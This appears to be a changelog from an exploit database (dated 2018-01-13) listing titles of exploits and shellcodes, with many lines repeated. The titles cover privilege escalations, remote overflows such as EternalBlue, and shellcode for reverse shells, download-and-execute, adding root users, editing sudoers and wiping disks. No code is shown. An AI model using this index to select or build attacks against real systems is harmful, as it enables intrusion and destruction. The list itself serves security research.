DB: 2018-01-13

1949 changes to exploits/shellcodes

Bird Chat 1.61 - Denial of Service

Quake 3 Engine Client (Windows x86) - CS_ITEms Remote Overflow

Mercur IMAPD 5.00.14 (Windows x86) - Remote Denial of Service

PHP 5.2.0 (Windows x86) - 'PHP_win32sti' Local Buffer Overflow

PHP 5.2.0 (Windows x86) - 'PHP_iisfunc.dll' Local Buffer Overflow

32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow (PoC)

Apple Safari 3.2.3 (Windows x86) - JavaScript 'eval' Remote Denial of Service

Apple Safari 4.0.3 (Windows x86) - 'CSS' Remote Denial of Service (1)

Apple Safari 4.0.3 (Windows x86) - 'CSS' Remote Denial of Service (2)

HP Data Protector Media Operations - Null Pointer Dereference Remote Denial of Service

AnyDVD 6.7.1.0 - Denial of Service

Microsoft Windows - Win32k Pointer Dereferencement (PoC) (MS10-098)

Apple Safari - GdiDrawStream Blue Screen of Death

Oracle VM VirtualBox 4.1 - Local Denial of Service

Linux Kernel 2.6.x (x64) - Personality Handling Local Denial of Service

Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free / Memory Corruption (PoC) (MS14-035)

VMware Workstations 10.0.0.40273 - 'vmx86.sys' Arbitrary Kernel Read

Linux Kernel 3.17.5 - IRET Instruction #SS Fault Handling Crash (PoC)

Samba < 3.6.2 (x86) - Denial of Service (PoC)

Adobe Flash (Linux x64) - Bad Dereference at 0x23c

Adobe Flash - XMLSocket Destructor Not Cleared Before Setting User Data in connect
Adobe Flash - Heap Buffer Overflow Loading '.FLV' File with Nellymoser Audio Codec
Adobe Flash - Heap Buffer Overflow Due to Indexing Error When Loading FLV File
Adobe Flash - Shared Object Type Confusion
Adobe Flash - Heap Buffer Overflow Loading '.FLV' File with Nellymoser Audio Codec
Adobe Flash - Heap Buffer Overflow Due to Indexing Error When Loading FLV File
Adobe Flash - Shared Object Type Confusion

ActiveState Perl.exe x64 Client 5.20.2 - Crash (PoC)
Microsoft Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (2)
Microsoft Windows Kernel - 'DeferWindowPos' Use-After-Free (MS15-073)
Microsoft Windows Kernel - 'UserCommitDesktopMemory' Use-After-Free (MS15-073)
Microsoft Windows Kernel - Pool Buffer Overflow Drawing Caption Bar (MS15-061)
Microsoft Windows Kernel - 'HmgAllocateObjectAttr' Use-After-Free (MS15-061)
Microsoft Windows Kernel - 'win32k!vSolidFillRect' Buffer Overflow (MS15-061)
Microsoft Windows Kernel - 'SURFOBJ' Null Pointer Dereference (MS15-061)
Microsoft Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (2)
Microsoft Windows Kernel - 'DeferWindowPos' Use-After-Free (MS15-073)
Microsoft Windows Kernel - 'UserCommitDesktopMemory' Use-After-Free (MS15-073)
Microsoft Windows Kernel - Pool Buffer Overflow Drawing Caption Bar (MS15-061)
Microsoft Windows Kernel - 'HmgAllocateObjectAttr' Use-After-Free (MS15-061)
Microsoft Windows Kernel - 'win32k!vSolidFillRect' Buffer Overflow (MS15-061)
Microsoft Windows Kernel - 'SURFOBJ' Null Pointer Dereference (MS15-061)
Microsoft Windows Kernel - WindowStation Use-After-Free (MS15-061)
Microsoft Windows Kernel - Null Pointer Dereference with Window Station and Clipboard (MS15-061)
Microsoft Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (1)
Microsoft Windows Kernel - 'FlashWindowEx​' Memory Corruption (MS15-097)
Microsoft Windows Kernel - 'bGetRealizedBrush' Use-After-Free (MS15-097)
Microsoft Windows Kernel - Use-After-Free with Cursor Object (MS15-097)
Microsoft Windows Kernel - Use-After-Free with Printer Device Contexts (MS15-097)
Microsoft Windows Kernel - 'NtGdiStretchBlt' Pool Buffer Overflow (MS15-097)
Microsoft Windows Kernel - WindowStation Use-After-Free (MS15-061)
Microsoft Windows Kernel - Null Pointer Dereference with Window Station and Clipboard (MS15-061)
Microsoft Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (1)
Microsoft Windows Kernel - 'FlashWindowEx​' Memory Corruption (MS15-097)
Microsoft Windows Kernel - 'bGetRealizedBrush' Use-After-Free (MS15-097)
Microsoft Windows Kernel - Use-After-Free with Cursor Object (MS15-097)
Microsoft Windows Kernel - Use-After-Free with Printer Device Contexts (MS15-097)
Microsoft Windows Kernel - 'NtGdiStretchBlt' Pool Buffer Overflow (MS15-097)

Microsoft Windows Kernel - 'NtGdiBitBlt' Buffer Overflow (MS15-097)

Tomabo MP4 Converter 3.10.12 < 3.11.12 - '.m3u' File Crush Application (Denial of Service)

Google Chrome - open-vcdiff Out-of-Bounds Read in Browser Process Integer Overflow
win32k Desktop and Clipboard - Null Pointer Dereference
win32k Clipboard Bitmap - Use-After-Free
win32k Desktop and Clipboard - Null Pointer Dereference
win32k Clipboard Bitmap - Use-After-Free

Adobe Flash Selection.SetSelection - Use-After-Free

Adobe Flash Sound.setTransform - Use-After-Free

Adobe Flash - Use-After-Free When Setting Stage

Linux (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited

Microsoft Windows Kernel - DrawMenuBarTemp Wild-Write (MS16-039)

Core FTP Server 32-bit Build 587 - Heap Overflow

Microsoft Windows - Custom Font Disable Policy Bypass

Wireshark 2.0.0 < 2.0.4 - CORBA IDL Dissectors Denial of Service

Evostream Media Server 1.7.1 (x64) - Denial of Service
Kentico CMS 11.0 - Buffer Overflow
PyroBatchFTP < 3.19 - Buffer Overflow

Microsoft Edge 38.14393.1066.0 - 'textarea.defaultValue' Memory Disclosure

Navicat Premium 11.2.11 (x64) - Local Database Password Disclosure

PrivateTunnel Client 2.7.0 (x64) - Local Credentials Disclosure

Oracle 10g (Windows x86) - 'PROCESS_DUP_HANDLE' Local Privilege Escalation

GIMP 2.2.14 (Windows x86) - '.ras' Download/Execute Buffer Overflow

Notepad++ 4.1 (Windows x86) - '.ruby' File Processing Buffer Overflow

Linux Kernel 2.4/2.6 (x86-64) - System Call Emulation Privilege Escalation

PHP 5.2.9 (Windows x86) - Local Safemod Bypass

Linux Kernel 2.6.24_16-23/2.6.27_7-10/2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86-64) - 'set_selection()' UTF-8 Off-by-One Privilege Escalation

Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)

HTMLDOC 1.9.x-r1629 (Windows x86) - '.html' Local Buffer Overflow

RadASM - '.rap' file Local Buffer Overflow

Mini-stream RM-MP3 Converter 3.1.2.1 - '.pls' Local Stack Buffer Overflow Universal

Audiotran 1.4.2.4 - Local Overflow (SEH)
Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation
Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Local Privilege Escalation
Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation
Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Local Privilege Escalation

Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Local Privilege Escalation (1)

Linux Kernel 4.6.3 (x86) - 'Netfilter' Local Privilege Escalation (Metasploit)

VideoLAN VLC Client (Windows x86) - 'smb://' URI Buffer Overflow (Metasploit)

QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows (ASLR + DEP Bypass) (Metasploit)

PHP 5.4.3 (Windows x86 Polish) - Code Execution

Microsoft Windows Kernel - Intel x64 SYSRET (MS12-042)

Dropbox Desktop Client 9.4.49 (x64) - Local Credentials Disclosure

Linux Kernel 3.3.x < 3.7.x (Arch Linux x86-64) - 'sock_diag_handlers[]' Local Privilege Escalation (1)

Linux Kernel 3.7.10 (Ubuntu 12.10 x64) - 'sock_diag_handlers' Local Privilege Escalation (2)

Linux Kernel < 3.8.9 (x86-64) - 'perf_swevent_init' Local Privilege Escalation (2)

Novell Client 2 SP3 - 'nicm.sys' Local Privilege Escalation (Metasploit)

Solaris Recommended Patch Cluster 6/19 (x86) - Local Privilege Escalation

Nvidia (nvsvc) Display Driver Service - Local Privilege Escalation (Metasploit)

Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X86_X32=y' Local Privilege Escalation (3)

LogMeIn Client 1.3.2462 (x64) - Local Credentials Disclosure

Systrace 1.x (x64) - Aware Linux Kernel Privilege Escalation

Microsoft Windows - NTUserMessageCall Win32k Kernel Pool Overflow 'schlamperei.x86.dll' (MS13-053) (Metasploit)

Linux Kernel 3.14-rc1 < 3.15-rc4 (x64) - Raw Mode PTY Echo Race Condition Privilege Escalation

Linux Kernel 3.2.0-23/3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Local Privilege Escalation (3)

TeamViewer 11.0.65452 (x64) - Local Credentials Disclosure

OpenVPN Private Tunnel Core Service - Unquoted Service Path Privilege Escalation
Linux Kernel < 3.2.0-23 (Ubuntu 12.04 x64) - 'ptrace/sysret' Local Privilege Escalation
Microsoft Windows XP SP3 - 'MQAC.sys' Arbitrary Write Privilege Escalation (Metasploit)
Linux Kernel < 3.2.0-23 (Ubuntu 12.04 x64) - 'ptrace/sysret' Local Privilege Escalation
Microsoft Windows XP SP3 - 'MQAC.sys' Arbitrary Write Privilege Escalation (Metasploit)

Microsoft Bluetooth Personal Area Networking - 'BthPan.sys' Local Privilege Escalation (Metasploit)

Microsoft Windows - OLE Package Manager Code Execution (MS14-060) (Metasploit)

Offset2lib - Bypassing Full ASLR On 64 bit Linux
Linux Kernel (x86-64) - Rowhammer Privilege Escalation
Rowhammer - NaCl Sandbox Escape
Linux Kernel (x86-64) - Rowhammer Privilege Escalation
Rowhammer - NaCl Sandbox Escape

Microsoft Windows 8.0/8.1 (x64) - 'TrackPopupMenu' Local Privilege Escalation (MS14-058)
Linux espfix64 - Nested NMIs Interrupting Privilege Escalation
Linux (x86) - Memory Sinkhole Privilege Escalation
Linux espfix64 - Nested NMIs Interrupting Privilege Escalation
Linux (x86) - Memory Sinkhole Privilege Escalation

Microsoft Windows XP SP3 (x86) / 2003 SP2 (x86) - 'NDProxy' Local Privilege Escalation (MS14-002)

Microsoft Windows - Font Driver Buffer Overflow (MS15-078) (Metasploit)

TrueCrypt 7 / VeraCrypt 1.13 - Drive Letter Symbolic Link Creation Privilege Escalation

Microsoft Windows 8.1 - 'win32k' Local Privilege Escalation (MS15-010)

MySQL 5.5.45 (x64) - Local Credentials Disclosure

Microsoft Windows 7 SP1 (x86) - 'WebDAV' Local Privilege Escalation (MS16-016) (1)

Microsoft Windows 7 (x86) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)

Secret Net 7 and Secret Net Studio 8 - Local Privilege Escalation

Microsoft Windows 7 (x64) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)

Microsoft Windows 8.1/10 (x86) - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)

ACROS Security 0patch 2016.05.19.539 - '0PatchServicex64.exe' Unquoted Service Path Privilege Escalation

Microsoft Windows 7 SP1 (x86) - Local Privilege Escalation (MS16-014)

Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation

Street Fighter 5 - 'Capcom.sys' Kernel Execution (Metasploit)

Microsoft Windows (x86) - 'afd.sys' Local Privilege Escalation (MS11-046)

Microsoft Windows (x86) - 'NDISTAPI' Local Privilege Escalation (MS11-062)

Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak

Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation

Microsoft Windows 8.1 (x64) - 'RGNOBJ' Integer Overflow (MS16-098)

PCAUSA Rawether (ASUS PCE-AC56 WLAN Card Utilities Windows 10 x64) - Local Privilege Escalation
Forticlient 5.2.3 (Windows 10 x64 Pre Anniversary) - Local Privilege Escalation
Forticlient 5.2.3 (Windows 10 x64 Post Anniversary) - Local Privilege Escalation
Forticlient 5.2.3 (Windows 10 x64 Pre Anniversary) - Local Privilege Escalation
Forticlient 5.2.3 (Windows 10 x64 Post Anniversary) - Local Privilege Escalation

Oracle VM VirtualBox 5.0.32 r112930 (x64) - Windows Process COM Injection Privilege Escalation
Linux Kernel - 'offset2lib' Stack Clash
Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap Stack Clash' Local Privilege Escalation
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64 Stack Clash' Local Privilege Escalation
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack Clash' Local Privilege Escalation
Linux Kernel - 'offset2lib' Stack Clash
Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap Stack Clash' Local Privilege Escalation
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64 Stack Clash' Local Privilege Escalation
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack Clash' Local Privilege Escalation

Razer Synapse 2.20.15.1104 - rzpnk.sys ZwOpenProcess (Metasploit)

Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098) (2)

Microsoft Windows 10 RS2 (x64) - 'win32kfull!bFill' Pool Overflow

Microsoft Windows 10 Creators Update (version 1703) (x86) - 'WARBIRD' 'NtQuerySystemInformation ' Kernel Local Privilege Escalation

BeroFTPD 1.3.4(1) (Linux x86) - Remote Code Execution

Microsoft Windows (x86) - Metafile '.emf' Heap Overflow (MS04-032)

Veritas NetBackup 6.0 (Windows x86) - 'bpjava-msvc' Remote Command Execution

gpsdrive 2.09 (x86) - 'friendsd2' Remote Format String

PrivateWire Gateway 3.7 (Windows x86) - Remote Buffer Overflow (Metasploit)

dproxy-nexgen (Linux x86) - Remote Buffer Overflow

Apache mod_rewrite (Windows x86) - Off-by-One Remote Overflow

3proxy 0.5.3g (Windows x86) - 'proxy.c logurl()' Remote Buffer Overflow

3proxy 0.5.3g (Windows x86) - 'logurl()' Remote Buffer Overflow (Perl)

SapLPD 6.28 (Windows x86) - Remote Buffer Overflow

Apache 2.0 mod_jk2 2.0.2 (Windows x86) - Remote Buffer Overflow

Apache mod_jk 1.2.19 (Windows x86) - Remote Buffer Overflow
32bit FTP (09.04.24) - 'CWD Response' Remote Buffer Overflow
32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow
32bit FTP (09.04.24) - 'CWD Response' Universal Overwrite (SEH)
32bit FTP - 'PASV' Reply Client Remote Overflow (Metasploit)
32bit FTP (09.04.24) - 'CWD Response' Remote Buffer Overflow
32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow
32bit FTP (09.04.24) - 'CWD Response' Universal Overwrite (SEH)
32bit FTP - 'PASV' Reply Client Remote Overflow (Metasploit)

Microsoft Internet Explorer 6/7/8 - 'winhlp32.exe MsgBox()' Remote Code Execution

Integard Home and Pro 2 - Remote HTTP Buffer Overflow

Knox Arkeia Backup Client Type 77 (Windows x86) - Remote Overflow (Metasploit)

Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit)

Oracle 9i XDB (Windows x86) - FTP PASS Overflow (Metasploit)

AASync 2.2.1.0 (Windows x86) - Remote Stack Buffer Overflow 'LIST' (Metasploit)

32bit FTP Client - Remote Stack Buffer Overflow (Metasploit)

SHOUTcast DNAS/Win32 1.9.4 - File Request Format String Overflow (Metasploit)

SHTTPD 1.34 (Windows x86) - URI-Encoded POST Request Overflow (Metasploit)

Icecast 2.0.1 (Windows x86) - Header Overwrite (Metasploit)
Apache (Windows x86) - Chunked Encoding (Metasploit)
McAfee ePolicy Orchestrator / ProtectionPilot - Remote Overflow (Metasploit)
Apache (Windows x86) - Chunked Encoding (Metasploit)
McAfee ePolicy Orchestrator / ProtectionPilot - Remote Overflow (Metasploit)

PeerCast 0.1216 (Windows x86) - URL Handling Buffer Overflow (Metasploit)

Oracle 9i XDB (Windows x86) - HTTP PASS Overflow (Metasploit)

CA CAM (Windows x86) - 'log_security()' Remote Stack Buffer Overflow (Metasploit)
Samba 3.3.12 (Linux x86) - 'chain_reply' Memory Corruption (Metasploit)
Samba 2.2.8 (Linux x86) - 'trans2open' Remote Overflow (Metasploit)
Samba 3.3.12 (Linux x86) - 'chain_reply' Memory Corruption (Metasploit)
Samba 2.2.8 (Linux x86) - 'trans2open' Remote Overflow (Metasploit)

WU-FTPD 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (3)

Nginx 1.3.9/1.4.0 (x86) - Brute Force

Nginx 1.4.0 (Generic Linux x64) - Remote Overflow

Oracle VM VirtualBox 4.3.6 - 3D Acceleration Virtual Machine Escape (Metasploit)

Symantec Endpoint Protection Manager - Authentication Bypass / Code Execution (Metasploit)

Symantec pcAnywhere 12.5.0 (Windows x86) - Remote Code Execution

PCMan FTP Server 2.0.7 - 'RENAME' Remote Buffer Overflow (Metasploit)

PCMan FTP Server 2.0.7 - 'ls' Remote Buffer Overflow (Metasploit)

ALLMediaServer 0.95 - Buffer Overflow

Microsoft Windows Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)

Microsoft Windows Windows 7/2008 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)

Microsoft Internet Explorer - 'mshtml.dll' Remote Code Execution (MS17-007)

Rancher Server - Docker Daemon Code Execution (Metasploit)
Unitrends UEB 9 - http api/storage Remote Root (Metasploit)
Unitrends UEB 9 - bpserverd Authentication Bypass Remote Command Execution (Metasploit)
Unitrends UEB 9 - http api/storage Remote Root (Metasploit)
Unitrends UEB 9 - bpserverd Authentication Bypass Remote Command Execution (Metasploit)

Microsoft Internet Explorer 11 (Windows 7 x86) - 'mshtml.dll' Remote Code Execution (MS17-007)

PHP-Nuke 8.1 SEO Arabic - Remote File Inclusion

Joomla! Component Elite Experts - SQL Injection

Traidnt UP - Cross-Site Request Forgery (Add Admin)

Allpc 2.5 osCommerce - SQL Injection / Cross-Site Scripting

Infoblox 6.8.2.11 - OS Command Injection
Xnami 1.0 - Cross-Site Scripting
Taxi Booking Script 1.0 - Cross-site Scripting

FreeBSD/x86 - ConnectBack (172.17.0.9:8000/TCP) + Receive Shellcode + Payload Loader + Return Results Null-Free Shellcode (90 bytes)
FreeBSD/x86 - Reverse Connection (172.17.0.9:8000/TCP) + Receive Shellcode + Payload Loader + Return Results Null-Free Shellcode (90 bytes)

FreeBSD/x86 - setuid(0); + execve(ipf -Fa); Shellcode (57 bytes)
FreeBSD/x86 - setuid(0) + execve(ipf -Fa) Shellcode (57 bytes)

Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (84 bytes)
Linux/MIPS (Linksys WRT54G/GL) - execve(_/bin/sh__[_/bin/sh_]_[]); Shellcode (60 bytes)
Linux/MIPS - execve /bin/sh Shellcode (56 bytes)
Linux/MIPS (Linksys WRT54G/GL) - execve(_/bin/sh__[_/bin/sh_]_[]) Shellcode (60 bytes)
Linux/MIPS (Little Endian) - execve(/bin/sh) Shellcode (56 bytes)
Linux/x86 - Self-Modifying Anti-IDS /bin/sh Shellcode (35/64 bytes)
Linux/x86 - HTTP Server (8800/TCP) + Fork Shellcode (166 bytes)
Linux/x86 - Bind TCP Listener (5555/TCP) + Receive Shellcode + Payload Loader Shellcode (83 bytes)
Linux/x86 - Disable Network Card Polymorphic Shellcode (75 bytes)
Linux/x86 - killall5 Polymorphic Shellcode (61 bytes)
Linux/x86 - execve /bin/sh Polymorphic Shellcode (48 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) XOR Encoded Shellcode (152 bytes)
Linux/x86 - reboot() Polymorphic Shellcode (57 bytes)
Linux/x86 - chmod 666 /etc/shadow Polymorphic Shellcode (54 bytes)
Linux/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh__0_0) Shellcode (34 bytes)
Linux/x86 - Bind TCP Shell (8000/TCP) + Flush IPTables Rules (/sbin/iptables -F) Shellcode (176 bytes)
Linux/x86 - Bind TCP Shell (8000/TCP) + Add Root User Shellcode (225+ bytes)
Linux/x86 - Bind TCP /bin/sh Shell (8000/TCP) Shellcode (179 bytes)
Linux/x86-64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes)
Linux/x86 - Serial Port Shell Binding (/dev/ttyS0) + busybox Launching Null-Free Shellcode (82 bytes)
Linux/x86 - File Unlinker Shellcode (18+ bytes)
Linux/x86 - Perl Script Execution Shellcode (99+ bytes)
Linux/x86 - Read /etc/passwd Shellcode (65+ bytes)
Linux/x86 - chmod 666 /etc/shadow + exit(0) Shellcode (30 bytes)
Linux/x86 - killall5 Shellcode (34 bytes)
Linux/x86 - PUSH reboot() Shellcode (30 bytes)
Linux/x86 - Self-Modifying Anti-IDS /bin/sh Shellcode (35/64 bytes)
Linux/x86 - HTTP Server (8800/TCP) + Fork Shellcode (166 bytes)
Linux/x86 - Bind TCP Listener (5555/TCP) + Receive Shellcode + Payload Loader Shellcode (83 bytes)
Linux/x86 - Disable Network Card Polymorphic Shellcode (75 bytes)
Linux/x86 - killall5 Polymorphic Shellcode (61 bytes)
Linux/x86 - execve /bin/sh Polymorphic Shellcode (48 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) XOR Encoded Shellcode (152 bytes)
Linux/x86 - reboot() Polymorphic Shellcode (57 bytes)
Linux/x86 - chmod 666 /etc/shadow Polymorphic Shellcode (54 bytes)
Linux/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh__0_0) Shellcode (34 bytes)
Linux/x86 - Bind TCP Shell (8000/TCP) + Flush IPTables Rules (/sbin/iptables -F) Shellcode (176 bytes)
Linux/x86 - Bind TCP Shell (8000/TCP) + Add Root User Shellcode (225+ bytes)
Linux/x86 - Bind TCP /bin/sh Shell (8000/TCP) Shellcode (179 bytes)
Linux/x86-64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes)
Linux/x86 - Serial Port Shell Binding (/dev/ttyS0) + busybox Launching Null-Free Shellcode (82 bytes)
Linux/x86 - File Unlinker Shellcode (18+ bytes)
Linux/x86 - Perl Script Execution Shellcode (99+ bytes)
Linux/x86 - Read /etc/passwd Shellcode (65+ bytes)
Linux/x86 - chmod 666 /etc/shadow + exit(0) Shellcode (30 bytes)
Linux/x86 - killall5 Shellcode (34 bytes)
Linux/x86 - PUSH reboot() Shellcode (30 bytes)
Linux/x86 - Reverse UDP tcpdump (54321/UDP) Live Packet Capture Shellcode (151 bytes)
Linux/x86 - Append RSA key to /root/.ssh/authorized_keys2 Shellcode (295 bytes)
Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) For Full Access Shellcode (86 bytes)
Linux/x86 - Promiscuous Mode Detector Shellcode (56 bytes)
Linux/x86 - setuid(0) + execve(/bin/sh_0_0) Null-Free Shellcode (28 bytes)
Linux/x86 - setresuid(0_0_0) + /bin/sh Shellcode (35 bytes)
Linux/x86 - iopl(3); asm(cli); while(1){} Shellcode (12 bytes)
Linux/x86 - System Beep Shellcode (45 bytes)
Linux/x86 - ConnectBack (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes)
Linux/x86 - setreuid(geteuid_ geteuid) + execve(/bin/sh) Shellcode (39 bytes)
Linux/x86 - Reverse TCP cat /etc/shadow (8192/TCP) Shellcode (155 bytes)
Linux/x86 - Reverse PHP (Writes to /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes)
Linux/x86 - /bin/rm -rf / + Attempts To Block The Process From Being Stopped Shellcode (132 bytes)
Linux/x86 - setuid(0) + setgid(0) + aslr_off (Disable ASLR Security) Shellcode (79 bytes)
Linux/x86 - Raw-Socket ICMP/Checksum /bin/sh Shell Shellcode (235 bytes)
Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (40 bytes)
Linux/x86 - Kill All Processes Shellcode (11 bytes)
Linux/x86 - execve read Shellcode (92 bytes)
Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (40 bytes)
Linux/x86 - Set System Time to 0 + exit Shellcode (12 bytes)
Linux/x86 - Add Root User (r00t) To /etc/passwd Shellcode (69 bytes)
Linux/x86 - chmod 0666 /etc/shadow + exit Shellcode (36 bytes)
Linux/x86 - Fork Bomb Shellcode (7 bytes)
Linux/x86 - execve(rm -rf /) Shellcode (45 bytes)
Linux/x86 - setuid(0) + execve /bin/sh Shellcode (28 bytes)
Linux/x86 - execve /bin/sh Shellcode (22 bytes)
Linux/x86 - Download File (HTTP/1.x http://0xdeadbeef/A) + execve() Null-Free Shellcode (111+ bytes)
Linux/x86 - setreuid + Executes Command Shellcode (49+ bytes)
Linux/x86 - stdin re-open + /bin/sh exec Shellcode (39 bytes)
Linux/x86 - execve /bin/sh (Re-Use Of Strings In .rodata) Shellcode (16 bytes)
Linux/x86 - setuid(0) + /bin/sh execve() Shellcode (30 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) + setuid Shellcode (96 bytes)
Linux/x86 - Bind TCP Shell (2707/TCP) Shellcode (84 bytes)
Linux/x86 - execve Diassembly Obfuscation Shellcode (32 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (100 bytes)
Linux/x86 - Reverse UDP tcpdump (54321/UDP) Live Packet Capture Shellcode (151 bytes)
Linux/x86 - Append RSA key to /root/.ssh/authorized_keys2 Shellcode (295 bytes)
Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) For Full Access Shellcode (86 bytes)
Linux/x86 - Promiscuous Mode Detector Shellcode (56 bytes)
Linux/x86 - setuid(0) + execve(/bin/sh_0_0) Null-Free Shellcode (28 bytes)
Linux/x86 - setresuid(0_0_0) + /bin/sh Shellcode (35 bytes)
Linux/x86 - iopl(3) + asm(cli) + while(1){} Shellcode (12 bytes)
Linux/x86 - System Beep Shellcode (45 bytes)
Linux/x86 - Reverse Connection (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes)
Linux/x86 - setreuid(geteuid_ geteuid) + execve(/bin/sh) Shellcode (39 bytes)
Linux/x86 - Reverse TCP cat /etc/shadow (8192/TCP) Shellcode (155 bytes)
Linux/x86 - Reverse PHP (Writes to /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes)
Linux/x86 - /bin/rm -rf / + Attempts To Block The Process From Being Stopped Shellcode (132 bytes)
Linux/x86 - setuid(0) + setgid(0) + aslr_off (Disable ASLR Security) Shellcode (79 bytes)
Linux/x86 - Raw-Socket ICMP/Checksum /bin/sh Shell Shellcode (235 bytes)
Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (40 bytes)
Linux/x86 - Kill All Processes Shellcode (11 bytes)
Linux/x86 - execve read Shellcode (92 bytes)
Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (40 bytes)
Linux/x86 - Set System Time to 0 + exit Shellcode (12 bytes)
Linux/x86 - Add Root User (r00t) To /etc/passwd Shellcode (69 bytes)
Linux/x86 - chmod 0666 /etc/shadow + exit Shellcode (36 bytes)
Linux/x86 - Fork Bomb Shellcode (7 bytes)
Linux/x86 - execve(rm -rf /) Shellcode (45 bytes)
Linux/x86 - setuid(0) + execve /bin/sh Shellcode (28 bytes)
Linux/x86 - execve /bin/sh Shellcode (22 bytes)
Linux/x86 - Download File (HTTP/1.x http://0xdeadbeef/A) + execve() Null-Free Shellcode (111+ bytes)
Linux/x86 - setreuid + Executes Command Shellcode (49+ bytes)
Linux/x86 - stdin re-open + /bin/sh exec Shellcode (39 bytes)
Linux/x86 - execve /bin/sh (Re-Use Of Strings In .rodata) Shellcode (16 bytes)
Linux/x86 - setuid(0) + /bin/sh execve() Shellcode (30 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) + setuid Shellcode (96 bytes)
Linux/x86 - Bind TCP Shell (2707/TCP) Shellcode (84 bytes)
Linux/x86 - execve Diassembly Obfuscation Shellcode (32 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (100 bytes)
Linux/x86 - execve /bin/sh Shellcode (24 bytes) (2)
Linux/x86 - Reverse TCP Shell (127.0.0.1:80/TCP) XOR Encoded Shellcode (371 bytes)
Linux/x86 - execve /bin/sh + '.ZIP' Header Shellcode (28 bytes)
Linux/x86 - execve /bin/sh + '.RTF' Header Shellcode (30 bytes)
Linux/x86 - execve /bin/sh + '.RIFF' Header Shellcode (28 bytes)
Linux/x86 - execve /bin/sh + '.BMP' Bitmap Header Shellcode (27 bytes)
Linux/x86 - Read SWAP + Write To /tmp/swr Shellcode (109 bytes)
Linux/x86 - Read /tmp/sws + Store In SWAP Shellcode (99 bytes)
Linux/x86 - Bind TCP /bin/sh Password (gotfault) Shell (64713/TCP) Shellcode (166 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (64713/TCP) Shellcode (86 bytes)
Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (25 bytes)
Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (23 bytes)
Linux/x86 - setuid(0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (31 bytes)
